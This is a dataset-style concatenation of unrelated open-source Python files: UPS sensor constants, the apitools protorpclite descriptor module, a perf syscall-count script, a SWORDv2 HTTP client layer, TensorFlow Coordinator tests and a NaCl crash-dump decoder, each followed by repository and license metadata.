PERCENTAGE,
"mdi:gauge",
DEVICE_CLASS_BATTERY,
],
"battery.charge.low": ["Low Battery Setpoint", PERCENTAGE, "mdi:gauge", None],
"battery.charge.restart": [
"Minimum Battery to Start",
PERCENTAGE,
"mdi:gauge",
None,
],
"battery.charge.warning": [
"Warning Battery Setpoint",
PERCENTAGE,
"mdi:gauge",
None,
],
"battery.charger.status": ["Charging Status", "", "mdi:information-outline", None],
"battery.voltage": ["Battery Voltage", VOLT, "mdi:flash", None],
"battery.voltage.nominal": ["Nominal Battery Voltage", VOLT, "mdi:flash", None],
"battery.voltage.low": ["Low Battery Voltage", VOLT, "mdi:flash", None],
"battery.voltage.high": ["High Battery Voltage", VOLT, "mdi:flash", None],
"battery.capacity": ["Battery Capacity", "Ah", "mdi:flash", None],
"battery.current": [
"Battery Current",
ELECTRICAL_CURRENT_AMPERE,
"mdi:flash",
None,
],
"battery.current.total": [
"Total Battery Current",
ELECTRICAL_CURRENT_AMPERE,
"mdi:flash",
None,
],
"battery.temperature": [
"Battery Temperature",
TEMP_CELSIUS,
"mdi:thermometer",
DEVICE_CLASS_TEMPERATURE,
],
"battery.runtime": ["Battery Runtime", TIME_SECONDS, "mdi:timer-outline", None],
"battery.runtime.low": [
"Low Battery Runtime",
TIME_SECONDS,
"mdi:timer-outline",
None,
],
"battery.runtime.restart": [
"Minimum Battery Runtime to Start",
TIME_SECONDS,
"mdi:timer-outline",
None,
],
"battery.alarm.threshold": [
"Battery Alarm Threshold",
"",
"mdi:information-outline",
None,
],
"battery.date": ["Battery Date", "", "mdi:calendar", None],
"battery.mfr.date": ["Battery Manuf. Date", "", "mdi:calendar", None],
"battery.packs": ["Number of Batteries", "", "mdi:information-outline", None],
"battery.packs.bad": [
"Number of Bad Batteries",
"",
"mdi:information-outline",
None,
],
"battery.type": ["Battery Chemistry", "", "mdi:information-outline", None],
"input.sensitivity": [
"Input Power Sensitivity",
"",
"mdi:information-outline",
None,
],
"input.transfer.low": ["Low Voltage Transfer", VOLT, "mdi:flash", None],
"input.transfer.high": ["High Voltage Transfer", VOLT, "mdi:flash", None],
"input.transfer.reason": [
"Voltage Transfer Reason",
"",
"mdi:information-outline",
None,
],
"input.voltage": ["Input Voltage", VOLT, "mdi:flash", None],
"input.voltage.nominal": ["Nominal Input Voltage", VOLT, "mdi:flash", None],
"input.frequency": ["Input Line Frequency", FREQUENCY_HERTZ, "mdi:flash", None],
"input.frequency.nominal": [
"Nominal Input Line Frequency",
FREQUENCY_HERTZ,
"mdi:flash",
None,
],
"input.frequency.status": [
"Input Frequency Status",
"",
"mdi:information-outline",
None,
],
"output.current": ["Output Current", ELECTRICAL_CURRENT_AMPERE, "mdi:flash", None],
"output.current.nominal": [
"Nominal Output Current",
ELECTRICAL_CURRENT_AMPERE,
"mdi:flash",
None,
],
"output.voltage": ["Output Voltage", VOLT, "mdi:flash", None],
"output.voltage.nominal": ["Nominal Output Voltage", VOLT, "mdi:flash", None],
"output.frequency": ["Output Frequency", FREQUENCY_HERTZ, "mdi:flash", None],
"output.frequency.nominal": [
"Nominal Output Frequency",
FREQUENCY_HERTZ,
"mdi:flash",
None,
],
}
STATE_TYPES = {
"OL": "Online",
"OB": "On Battery",
"LB": "Low Battery",
"HB": "High Battery",
"RB": "Battery Needs Replaced",
"CHRG": "Battery Charging",
"DISCHRG": "Battery Discharging",
"BYPASS": "Bypass Active",
"CAL": "Runtime Calibration",
"OFF": "Offline",
"OVER": "Overloaded",
"TRIM": "Trimming Voltage",
"BOOST": "Boosting Voltage",
"FSD": "Forced Shutdown",
"ALARM": "Alarm",
}
SENSOR_NAME = 0
SENSOR_UNIT = 1
SENSOR_ICON = 2
SENSOR_DEVICE_CLASS = 3
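# Illustrative lookup (added sketch, not part of the upstream component):
# each SENSOR_TYPES value is a [name, unit, icon, device_class] list indexed
# by the constants above, e.g.:
#
#     meta = SENSOR_TYPES["battery.charge"]
#     name = meta[SENSOR_NAME]                   # "Battery Charge"
#     unit = meta[SENSOR_UNIT]                   # PERCENTAGE
#     device_class = meta[SENSOR_DEVICE_CLASS]   # DEVICE_CLASS_BATTERY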
| apache-2.0 |
Sorsly/subtle | google-cloud-sdk/lib/third_party/apitools/base/protorpclite/descriptor.py | 6 | 19700 | #!/usr/bin/env python
#
# Copyright 2010 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Services descriptor definitions.
Contains message definitions and functions for converting
service classes into transmittable message format.
Describing an Enum instance, Enum class, Field class or Message class will
generate an appropriate descriptor object that describes that class.
This message can itself be used to transmit information to clients wishing
to know the description of an enum value, enum, field or message without
needing to download the source code. This format is also compatible with
other, non-Python languages.
The descriptors are modeled to be binary compatible with
https://github.com/google/protobuf
NOTE: The names of types and fields are not always the same between these
descriptors and the ones defined in descriptor.proto. This was done in order
to make source code files that use these descriptors easier to read. For
example, it is not necessary to prefix TYPE to all the values in
FieldDescriptor.Variant as is done in descriptor.proto
FieldDescriptorProto.Type.
Example:
class Pixel(messages.Message):
x = messages.IntegerField(1, required=True)
y = messages.IntegerField(2, required=True)
color = messages.BytesField(3)
# Describe Pixel class using message descriptor.
fields = []
field = FieldDescriptor()
field.name = 'x'
field.number = 1
field.label = FieldDescriptor.Label.REQUIRED
field.variant = FieldDescriptor.Variant.INT64
fields.append(field)
field = FieldDescriptor()
field.name = 'y'
field.number = 2
field.label = FieldDescriptor.Label.REQUIRED
field.variant = FieldDescriptor.Variant.INT64
fields.append(field)
field = FieldDescriptor()
field.name = 'color'
field.number = 3
field.label = FieldDescriptor.Label.OPTIONAL
field.variant = FieldDescriptor.Variant.BYTES
fields.append(field)
message = MessageDescriptor()
message.name = 'Pixel'
message.fields = fields
# Describing is the equivalent of building the above message.
message == describe_message(Pixel)
Public Classes:
EnumValueDescriptor: Describes Enum values.
EnumDescriptor: Describes Enum classes.
FieldDescriptor: Describes field instances.
FileDescriptor: Describes a single 'file' unit.
FileSet: Describes a collection of file descriptors.
MessageDescriptor: Describes Message classes.
Public Functions:
describe_enum_value: Describe an individual enum-value.
describe_enum: Describe an Enum class.
describe_field: Describe a Field definition.
describe_file: Describe a 'file' unit from a Python module or object.
describe_file_set: Describe a file set from a list of modules or objects.
describe_message: Describe a Message definition.
"""
import codecs
import types
import six
from apitools.base.protorpclite import messages
from apitools.base.protorpclite import util
__all__ = [
'EnumDescriptor',
'EnumValueDescriptor',
'FieldDescriptor',
'MessageDescriptor',
'FileDescriptor',
'FileSet',
'DescriptorLibrary',
'describe_enum',
'describe_enum_value',
'describe_field',
'describe_message',
'describe_file',
'describe_file_set',
'describe',
'import_descriptor_loader',
]
# NOTE: MessageField is missing because message fields cannot have
# a default value at this time.
# TODO(user): Support default message values.
#
# Map to functions that convert default values of fields of a given type
# to a string. The function must return a value that is compatible with
# FieldDescriptor.default_value and therefore a unicode string.
_DEFAULT_TO_STRING_MAP = {
messages.IntegerField: six.text_type,
messages.FloatField: six.text_type,
messages.BooleanField: lambda value: value and u'true' or u'false',
messages.BytesField: lambda value: codecs.escape_encode(value)[0],
messages.StringField: lambda value: value,
messages.EnumField: lambda value: six.text_type(value.number),
}
_DEFAULT_FROM_STRING_MAP = {
messages.IntegerField: int,
messages.FloatField: float,
messages.BooleanField: lambda value: value == u'true',
messages.BytesField: lambda value: codecs.escape_decode(value)[0],
messages.StringField: lambda value: value,
messages.EnumField: int,
}
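# Illustrative round-trip (added sketch): for a given field class the two
# maps are inverses, e.g. an integer default survives to-string/from-string:
#
#     as_text = _DEFAULT_TO_STRING_MAP[messages.IntegerField](42)   # u'42'
#     assert _DEFAULT_FROM_STRING_MAP[messages.IntegerField](as_text) == 42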
class EnumValueDescriptor(messages.Message):
"""Enum value descriptor.
Fields:
name: Name of enumeration value.
number: Number of enumeration value.
"""
# TODO(user): Why are these listed as optional in descriptor.proto.
# Harmonize?
name = messages.StringField(1, required=True)
number = messages.IntegerField(2,
required=True,
variant=messages.Variant.INT32)
class EnumDescriptor(messages.Message):
"""Enum class descriptor.
Fields:
name: Name of Enum without any qualification.
values: Values defined by Enum class.
"""
name = messages.StringField(1)
values = messages.MessageField(EnumValueDescriptor, 2, repeated=True)
class FieldDescriptor(messages.Message):
"""Field definition descriptor.
Enums:
Variant: Wire format hint sub-types for field.
Label: Values for optional, required and repeated fields.
Fields:
name: Name of field.
number: Number of field.
variant: Variant of field.
type_name: Type name for message and enum fields.
default_value: String representation of default value.
"""
Variant = messages.Variant # pylint:disable=invalid-name
class Label(messages.Enum):
"""Field label."""
OPTIONAL = 1
REQUIRED = 2
REPEATED = 3
name = messages.StringField(1, required=True)
number = messages.IntegerField(3,
required=True,
variant=messages.Variant.INT32)
label = messages.EnumField(Label, 4, default=Label.OPTIONAL)
variant = messages.EnumField(Variant, 5)
type_name = messages.StringField(6)
# For numeric types, contains the original text representation of
# the value.
# For booleans, "true" or "false".
# For strings, contains the default text contents (not escaped in any
# way).
# For bytes, contains the C escaped value. All bytes < 128 that are
# traditionally considered unprintable are also escaped.
default_value = messages.StringField(7)
class MessageDescriptor(messages.Message):
"""Message definition descriptor.
Fields:
name: Name of Message without any qualification.
fields: Fields defined for message.
message_types: Nested Message classes defined on message.
enum_types: Nested Enum classes defined on message.
"""
name = messages.StringField(1)
fields = messages.MessageField(FieldDescriptor, 2, repeated=True)
message_types = messages.MessageField(
'apitools.base.protorpclite.descriptor.MessageDescriptor', 3,
repeated=True)
enum_types = messages.MessageField(EnumDescriptor, 4, repeated=True)
class FileDescriptor(messages.Message):
"""Description of file containing protobuf definitions.
Fields:
package: Fully qualified name of package that definitions belong to.
message_types: Message definitions contained in file.
enum_types: Enum definitions contained in file.
"""
package = messages.StringField(2)
# TODO(user): Add dependency field
message_types = messages.MessageField(MessageDescriptor, 4, repeated=True)
enum_types = messages.MessageField(EnumDescriptor, 5, repeated=True)
class FileSet(messages.Message):
"""A collection of FileDescriptors.
Fields:
files: Files in file-set.
"""
files = messages.MessageField(FileDescriptor, 1, repeated=True)
def describe_enum_value(enum_value):
"""Build descriptor for Enum instance.
Args:
enum_value: Enum value to provide descriptor for.
Returns:
Initialized EnumValueDescriptor instance describing the Enum instance.
"""
enum_value_descriptor = EnumValueDescriptor()
enum_value_descriptor.name = six.text_type(enum_value.name)
enum_value_descriptor.number = enum_value.number
return enum_value_descriptor
def describe_enum(enum_definition):
"""Build descriptor for Enum class.
Args:
enum_definition: Enum class to provide descriptor for.
Returns:
Initialized EnumDescriptor instance describing the Enum class.
"""
enum_descriptor = EnumDescriptor()
enum_descriptor.name = enum_definition.definition_name().split('.')[-1]
values = []
for number in enum_definition.numbers():
value = enum_definition.lookup_by_number(number)
values.append(describe_enum_value(value))
if values:
enum_descriptor.values = values
return enum_descriptor
def describe_field(field_definition):
"""Build descriptor for Field instance.
Args:
field_definition: Field instance to provide descriptor for.
Returns:
Initialized FieldDescriptor instance describing the Field instance.
"""
field_descriptor = FieldDescriptor()
field_descriptor.name = field_definition.name
field_descriptor.number = field_definition.number
field_descriptor.variant = field_definition.variant
if isinstance(field_definition, messages.EnumField):
field_descriptor.type_name = field_definition.type.definition_name()
if isinstance(field_definition, messages.MessageField):
field_descriptor.type_name = (
field_definition.message_type.definition_name())
if field_definition.default is not None:
field_descriptor.default_value = _DEFAULT_TO_STRING_MAP[
type(field_definition)](field_definition.default)
# Set label.
if field_definition.repeated:
field_descriptor.label = FieldDescriptor.Label.REPEATED
elif field_definition.required:
field_descriptor.label = FieldDescriptor.Label.REQUIRED
else:
field_descriptor.label = FieldDescriptor.Label.OPTIONAL
return field_descriptor
def describe_message(message_definition):
"""Build descriptor for Message class.
Args:
message_definition: Message class to provide descriptor for.
Returns:
Initialized MessageDescriptor instance describing the Message class.
"""
message_descriptor = MessageDescriptor()
message_descriptor.name = message_definition.definition_name().split(
'.')[-1]
fields = sorted(message_definition.all_fields(),
key=lambda v: v.number)
if fields:
message_descriptor.fields = [describe_field(field) for field in fields]
try:
nested_messages = message_definition.__messages__
except AttributeError:
pass
else:
message_descriptors = []
for name in nested_messages:
value = getattr(message_definition, name)
message_descriptors.append(describe_message(value))
message_descriptor.message_types = message_descriptors
try:
nested_enums = message_definition.__enums__
except AttributeError:
pass
else:
enum_descriptors = []
for name in nested_enums:
value = getattr(message_definition, name)
enum_descriptors.append(describe_enum(value))
message_descriptor.enum_types = enum_descriptors
return message_descriptor
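# Example (sketch): describing a hypothetical message class. "Point" is
# illustrative and not defined in this module.
#
#   class Point(messages.Message):
#       x = messages.IntegerField(1, required=True)
#       y = messages.IntegerField(2, required=True)
#
#   descriptor = describe_message(Point)
#   descriptor.name                      # -> 'Point'
#   [f.name for f in descriptor.fields]  # -> ['x', 'y']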
def describe_file(module):
"""Build a file from a specified Python module.
Args:
module: Python module to describe.
Returns:
Initialized FileDescriptor instance describing the module.
"""
descriptor = FileDescriptor()
descriptor.package = util.get_package_for_module(module)
if not descriptor.package:
descriptor.package = None
message_descriptors = []
enum_descriptors = []
# Need to iterate over all top-level attributes of the module looking for
# message and enum definitions. Each definition must itself be described.
for name in sorted(dir(module)):
value = getattr(module, name)
if isinstance(value, type):
if issubclass(value, messages.Message):
message_descriptors.append(describe_message(value))
elif issubclass(value, messages.Enum):
enum_descriptors.append(describe_enum(value))
if message_descriptors:
descriptor.message_types = message_descriptors
if enum_descriptors:
descriptor.enum_types = enum_descriptors
return descriptor
def describe_file_set(modules):
"""Build a file set from a specified Python modules.
Args:
modules: Iterable of Python module to describe.
Returns:
Initialized FileSet instance describing the modules.
"""
descriptor = FileSet()
file_descriptors = []
for module in modules:
file_descriptors.append(describe_file(module))
if file_descriptors:
descriptor.files = file_descriptors
return descriptor
def describe(value):
"""Describe any value as a descriptor.
Helper function for describing any object with an appropriate descriptor
object.
Args:
value: Value to describe as a descriptor.
Returns:
Descriptor message class if object is describable as a descriptor, else
None.
"""
if isinstance(value, types.ModuleType):
return describe_file(value)
elif isinstance(value, messages.Field):
return describe_field(value)
elif isinstance(value, messages.Enum):
return describe_enum_value(value)
elif isinstance(value, type):
if issubclass(value, messages.Message):
return describe_message(value)
elif issubclass(value, messages.Enum):
return describe_enum(value)
return None
@util.positional(1)
def import_descriptor_loader(definition_name, importer=__import__):
"""Find objects by importing modules as needed.
A definition loader is a function that resolves a definition name to a
descriptor.
The import finder resolves definition names to descriptors by importing
modules when necessary.
Args:
definition_name: Name of definition to find.
importer: Import function used for importing new modules.
Returns:
Appropriate descriptor for any describable type located by name.
Raises:
DefinitionNotFoundError when a name does not refer to either a definition
or a module.
"""
# Attempt to import descriptor as a module.
if definition_name.startswith('.'):
definition_name = definition_name[1:]
if not definition_name.startswith('.'):
leaf = definition_name.split('.')[-1]
if definition_name:
try:
module = importer(definition_name, '', '', [leaf])
except ImportError:
pass
else:
return describe(module)
try:
# Attempt to use messages.find_definition to find item.
return describe(messages.find_definition(definition_name,
importer=__import__))
except messages.DefinitionNotFoundError as err:
# There are things that find_definition will not find, but if
# the parent is loaded, its children can be searched for a
# match.
split_name = definition_name.rsplit('.', 1)
if len(split_name) > 1:
parent, child = split_name
try:
parent_definition = import_descriptor_loader(
parent, importer=importer)
except messages.DefinitionNotFoundError:
# Fall through to original error.
pass
else:
# Check the parent definition for a matching descriptor.
if isinstance(parent_definition, EnumDescriptor):
search_list = parent_definition.values or []
elif isinstance(parent_definition, MessageDescriptor):
search_list = parent_definition.fields or []
else:
search_list = []
for definition in search_list:
if definition.name == child:
return definition
# Still didn't find. Reraise original exception.
raise err
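# Resolution sketch (module and attribute names are illustrative):
#
#   import_descriptor_loader('my_messages')            # -> FileDescriptor
#   import_descriptor_loader('my_messages.MyMessage')  # -> MessageDescriptor
#   import_descriptor_loader('my_messages.MyMessage.a_field')
#   # -> FieldDescriptor, found by searching the parent's fields when
#   #    find_definition cannot resolve the leaf name directly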
class DescriptorLibrary(object):
"""A descriptor library is an object that contains known definitions.
A descriptor library contains a cache of descriptor objects mapped by
definition name. It contains all types of descriptors except for
file sets.
When a definition name is requested that the library does not know about,
it can be provided with a descriptor loader, which attempts to resolve the
missing descriptor.
"""
@util.positional(1)
def __init__(self,
descriptors=None,
descriptor_loader=import_descriptor_loader):
"""Constructor.
Args:
descriptors: A dictionary or dictionary-like object that can be used
to store and cache descriptors by definition name.
descriptor_loader: A function used for resolving missing descriptors.
The function takes a definition name as its parameter and returns
an appropriate descriptor. It may raise DefinitionNotFoundError.
"""
self.__descriptor_loader = descriptor_loader
self.__descriptors = descriptors or {}
def lookup_descriptor(self, definition_name):
"""Lookup descriptor by name.
Get a descriptor from the library by name. If the descriptor is not
found, an attempt is made to resolve it via the descriptor loader, if
provided.
Args:
definition_name: Definition name to find.
Returns:
Descriptor that describes definition name.
Raises:
DefinitionNotFoundError if no descriptor exists for the definition name.
"""
try:
return self.__descriptors[definition_name]
except KeyError:
pass
if self.__descriptor_loader:
definition = self.__descriptor_loader(definition_name)
self.__descriptors[definition_name] = definition
return definition
else:
raise messages.DefinitionNotFoundError(
'Could not find definition for %s' % definition_name)
def lookup_package(self, definition_name):
"""Determines the package name for any definition.
Determine the package that any definition name belongs to. May check
the parent for the package name and will resolve missing descriptors
if a descriptor loader is provided.
Args:
definition_name: Definition name to find package for.
"""
while True:
descriptor = self.lookup_descriptor(definition_name)
if isinstance(descriptor, FileDescriptor):
return descriptor.package
else:
index = definition_name.rfind('.')
if index < 0:
return None
definition_name = definition_name[:index]
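# Usage sketch (assumes a module 'my_messages' importable on sys.path;
# all names are illustrative):
#
#   library = DescriptorLibrary()
#   descriptor = library.lookup_descriptor('my_messages.MyMessage')
#   package = library.lookup_package('my_messages.MyMessage')
#
# Repeated lookups of the same name are served from the internal cache.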
| mit |
teamacid/android_kernel_teamacid | tools/perf/scripts/python/syscall-counts.py | 944 | 1429 | # system call counts
# (c) 2010, Tom Zanussi <[email protected]>
# Licensed under the terms of the GNU GPL License version 2
#
# Displays system-wide system call totals, broken down by syscall.
# If a [comm] arg is specified, only syscalls called by [comm] are displayed.
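# Example (matching the usage string below):
#   perf trace -s syscall-counts.py            # system-wide totals
#   perf trace -s syscall-counts.py some_comm  # totals for one command only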
import os
import sys
sys.path.append(os.environ['PERF_EXEC_PATH'] + \
'/scripts/python/Perf-Trace-Util/lib/Perf/Trace')
from perf_trace_context import *
from Core import *
usage = "perf trace -s syscall-counts.py [comm]\n";
for_comm = None
if len(sys.argv) > 2:
sys.exit(usage)
if len(sys.argv) > 1:
for_comm = sys.argv[1]
syscalls = autodict()
def trace_begin():
pass
def trace_end():
print_syscall_totals()
def raw_syscalls__sys_enter(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
id, args):
if for_comm is not None:
if common_comm != for_comm:
return
try:
syscalls[id] += 1
except TypeError:
syscalls[id] = 1
def print_syscall_totals():
if for_comm is not None:
print "\nsyscall events for %s:\n\n" % (for_comm),
else:
print "\nsyscall events:\n\n",
print "%-40s %10s\n" % ("event", "count"),
print "%-40s %10s\n" % ("----------------------------------------", \
"-----------"),
for id, val in sorted(syscalls.iteritems(), key = lambda(k, v): (v, k), \
reverse = True):
print "%-40d %10d\n" % (id, val),
| gpl-2.0 |
JiscPER/magnificent-octopus | octopus/modules/swordv2/client_http.py | 1 | 1816 | from sword2 import HttpLayer, HttpResponse
from octopus.lib import http
import json
from requests.auth import HTTPBasicAuth
class OctopusHttpResponse(HttpResponse):
def __init__(self, *args, **kwargs):
self.resp = None
if len(args) > 0:
self.resp = args[0]
def __getitem__(self, att):
return self.get(att)
def __repr__(self):
return self.resp.__repr__()
@property
def status(self):
if self.resp is None:
return 408 # timeout
return self.resp.status_code
def get(self, att, default=None):
if att == "status":
return self.status
if self.resp is None:
return default
return self.resp.headers.get(att, default)
def keys(self):
return self.resp.headers.keys()
class OctopusHttpLayer(HttpLayer):
def __init__(self, *args, **kwargs):
self.username = None
self.password = None
self.auth = None
def add_credentials(self, username, password):
self.username = username
self.password = password
self.auth = HTTPBasicAuth(username, password)
def request(self, uri, method, headers=None, payload=None): # Note that payload can be file-like
resp = None
if method == "GET":
resp = http.get(uri, headers=headers, auth=self.auth)
elif method == "POST":
resp = http.post(uri, headers=headers, data=payload, auth=self.auth)
elif method == "PUT":
resp = http.put(uri, headers=headers, data=payload, auth=self.auth)
elif method == "DELETE":
resp = http.delete(uri, headers=headers, auth=self.auth)
if resp is None:
return OctopusHttpResponse(), u""
return OctopusHttpResponse(resp), resp.text
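# Usage sketch (hypothetical service document URL; assumes sword2's
# Connection accepts a custom HTTP layer via its http_impl argument):
#
#   from sword2 import Connection
#   http_layer = OctopusHttpLayer()
#   http_layer.add_credentials("username", "password")
#   conn = Connection("http://example.com/sword2/service-document",
#                     http_impl=http_layer)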
| apache-2.0 |
awni/tensorflow | tensorflow/python/training/coordinator_test.py | 6 | 4200 | # Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Coordinator."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import sys
import threading
import time
import tensorflow as tf
def StopInN(coord, n_secs):
time.sleep(n_secs)
coord.request_stop()
def RaiseInN(coord, n_secs, ex, report_exception):
try:
time.sleep(n_secs)
raise ex
except RuntimeError as e:
if report_exception:
coord.request_stop(e)
else:
coord.request_stop(sys.exc_info())
def RaiseInNUsingContextHandler(coord, n_secs, ex):
with coord.stop_on_exception():
time.sleep(n_secs)
raise ex
def SleepABit(n_secs):
time.sleep(n_secs)
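# The helpers above drive the typical Coordinator pattern (sketch; `worker`
# is an illustrative thread target):
#
#   coord = tf.train.Coordinator()
#   threads = [threading.Thread(target=worker, args=(coord,))
#              for _ in range(4)]
#   for t in threads:
#     t.start()
#   coord.join(threads)  # re-raises exceptions reported via request_stop()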
class CoordinatorTest(tf.test.TestCase):
def testStopAPI(self):
coord = tf.train.Coordinator()
self.assertFalse(coord.should_stop())
self.assertFalse(coord.wait_for_stop(0.01))
coord.request_stop()
self.assertTrue(coord.should_stop())
self.assertTrue(coord.wait_for_stop(0.01))
def testStopAsync(self):
coord = tf.train.Coordinator()
self.assertFalse(coord.should_stop())
self.assertFalse(coord.wait_for_stop(0.1))
threading.Thread(target=StopInN, args=(coord, 0.02)).start()
self.assertFalse(coord.should_stop())
self.assertFalse(coord.wait_for_stop(0.01))
self.assertTrue(coord.wait_for_stop(0.03))
self.assertTrue(coord.should_stop())
def testJoin(self):
coord = tf.train.Coordinator()
threads = [
threading.Thread(target=SleepABit, args=(0.01,)),
threading.Thread(target=SleepABit, args=(0.02,)),
threading.Thread(target=SleepABit, args=(0.01,))]
for t in threads:
t.start()
coord.join(threads)
def testJoinGraceExpires(self):
coord = tf.train.Coordinator()
threads = [
threading.Thread(target=StopInN, args=(coord, 0.01)),
threading.Thread(target=SleepABit, args=(10.0,))]
for t in threads:
t.daemon = True
t.start()
with self.assertRaisesRegexp(RuntimeError, "threads still running"):
coord.join(threads, stop_grace_period_secs=0.02)
def testJoinRaiseReportExcInfo(self):
coord = tf.train.Coordinator()
threads = [
threading.Thread(target=RaiseInN,
args=(coord, 0.01, RuntimeError("First"), False)),
threading.Thread(target=RaiseInN,
args=(coord, 0.02, RuntimeError("Too late"), False))]
for t in threads:
t.start()
with self.assertRaisesRegexp(RuntimeError, "First"):
coord.join(threads)
def testJoinRaiseReportException(self):
coord = tf.train.Coordinator()
threads = [
threading.Thread(target=RaiseInN,
args=(coord, 0.01, RuntimeError("First"), True)),
threading.Thread(target=RaiseInN,
args=(coord, 0.02, RuntimeError("Too late"), True))]
for t in threads:
t.start()
with self.assertRaisesRegexp(RuntimeError, "First"):
coord.join(threads)
def testJoinRaiseReportExceptionUsingHandler(self):
coord = tf.train.Coordinator()
threads = [
threading.Thread(target=RaiseInNUsingContextHandler,
args=(coord, 0.01, RuntimeError("First"))),
threading.Thread(target=RaiseInNUsingContextHandler,
args=(coord, 0.02, RuntimeError("Too late")))]
for t in threads:
t.start()
with self.assertRaisesRegexp(RuntimeError, "First"):
coord.join(threads)
if __name__ == "__main__":
tf.test.main()
| apache-2.0 |
fujunwei/chromium-crosswalk | native_client_sdk/src/tools/decode_dump.py | 51 | 6717 | #!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Utility to decode a crash dump generated by untrusted_crash_dump.[ch]
Currently this produces a simple stack trace.
"""
import argparse
import json
import os
import posixpath
import subprocess
import sys
class CoreDecoder(object):
"""Class to process core dumps."""
def __init__(self, main_nexe, nmf_filename,
addr2line, library_paths, platform):
"""Construct and object to process core dumps.
Args:
main_nexe: nexe to resolve NaClMain references from.
nmf_filename: nmf to resolve references from.
addr2line: path to appropriate addr2line.
library_paths: list of paths to search for libraries.
platform: platform string to use in nmf files.
"""
self.main_nexe = main_nexe
self.nmf_filename = nmf_filename
if nmf_filename == '-':
self.nmf_data = {}
else:
self.nmf_data = json.load(open(nmf_filename))
self.addr2line = addr2line
self.library_paths = library_paths
self.platform = platform
def _SelectModulePath(self, filename):
"""Select which path to get a module from.
Args:
filename: filename of a module (as appears in phdrs).
Returns:
Full local path to the file.
Derived by consulting the manifest.
"""
# For some names try the main nexe.
# NaClMain is the argv[0] setup in sel_main.c
# (null) shows up in chrome.
if self.main_nexe is not None and filename in ['NaClMain', '(null)']:
return self.main_nexe
filepart = posixpath.basename(filename)
nmf_entry = self.nmf_data.get('files', {}).get(filepart, {})
nmf_url = nmf_entry.get(self.platform, {}).get('url')
# Try filename directly if not in manifest.
if nmf_url is None:
return filename
# Look for the module relative to the manifest (if any),
# then in other search paths.
paths = []
if self.nmf_filename != '-':
paths.append(os.path.dirname(self.nmf_filename))
paths.extend(self.library_paths)
for path in paths:
pfilename = os.path.join(path, nmf_url)
if os.path.exists(pfilename):
return pfilename
# If nothing else, try the path directly.
return filename
def _DecodeAddressSegment(self, segments, address):
"""Convert an address to a segment relative one, plus filename.
Args:
segments: a list of phdr segments.
address: a process wide code address.
Returns:
A tuple of filename and segment relative address.
"""
for segment in segments:
for phdr in segment['dlpi_phdr']:
start = segment['dlpi_addr'] + phdr['p_vaddr']
end = start + phdr['p_memsz']
if address >= start and address < end:
return (segment['dlpi_name'], address - segment['dlpi_addr'])
return ('(null)', address)
def _Addr2Line(self, segments, address):
"""Use addr2line to decode a code address.
Args:
segments: A list of phdr segments.
address: a code address.
Returns:
A list of dicts containing: function, filename, lineno.
"""
filename, address = self._DecodeAddressSegment(segments, address)
filename = self._SelectModulePath(filename)
if not os.path.exists(filename):
return [{
'function': 'Unknown_function',
'filename': 'unknown_file',
'lineno': -1,
}]
# Use address - 1 to get the call site instead of the line after.
address -= 1
cmd = [
self.addr2line, '-f', '--inlines', '-e', filename, '0x%08x' % address,
]
process = subprocess.Popen(cmd, stdout=subprocess.PIPE)
process_stdout, _ = process.communicate()
assert process.returncode == 0
lines = process_stdout.splitlines()
assert len(lines) % 2 == 0
results = []
for index in xrange(len(lines) / 2):
func = lines[index * 2]
afilename, lineno = lines[index * 2 + 1].split(':', 1)
results.append({
'function': func,
'filename': afilename,
'lineno': int(lineno),
})
return results
def Decode(self, text):
core = json.loads(text)
for frame in core['frames']:
frame['scopes'] = self._Addr2Line(core['segments'], frame['prog_ctr'])
return core
def LoadAndDecode(self, core_path):
"""Given a core.json file, load and embellish with decoded addresses.
Args:
core_path: source file containing a dump.
Returns:
An embellished core dump dict (decoded code addresses).
"""
core = json.load(open(core_path))
for frame in core['frames']:
frame['scopes'] = self._Addr2Line(core['segments'], frame['prog_ctr'])
return core
def StackTrace(self, info):
"""Convert a decoded core.json dump to a simple stack trace.
Args:
info: core.json info with decoded code addresses.
Returns:
A list of dicts with filename, lineno, function (deepest first).
"""
trace = []
for frame in info['frames']:
for scope in frame['scopes']:
trace.append(scope)
return trace
def PrintTrace(self, trace, out):
"""Print a trace to a file like object.
Args:
trace: A list of [filename, lineno, function] (deepest first).
out: file like object to output the trace to.
"""
for scope in trace:
out.write('%s at %s:%d\n' % (
scope['function'],
scope['filename'],
scope['lineno']))
def main(args):
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument('-m', '--main-nexe',
help='nexe to resolve NaClMain references from')
parser.add_argument('-n', '--nmf', default='-',
help='nmf to resolve references from')
parser.add_argument('-a', '--addr2line',
help='path to appropriate addr2line')
parser.add_argument('-L', '--library-path', dest='library_paths',
action='append', default=[],
help='path to search for shared libraries')
parser.add_argument('-p', '--platform',
help='platform in a style matching nmf files')
parser.add_argument('core_json')
options = parser.parse_args(args)
decoder = CoreDecoder(
main_nexe=options.main_nexe,
nmf_filename=options.nmf,
addr2line=options.addr2line,
library_paths=options.library_paths,
platform=options.platform)
info = decoder.LoadAndDecode(options.core_json)
trace = decoder.StackTrace(info)
decoder.PrintTrace(trace, sys.stdout)
return 0
if __name__ == '__main__':
sys.exit(main(sys.argv[1:]))
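# Example invocation (paths, toolchain and platform are illustrative):
#   decode_dump.py -m my_app_x86_64.nexe -n my_app.nmf \
#       -a x86_64-nacl-addr2line -L lib64 -p x86-64 core.json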
| bsd-3-clause |
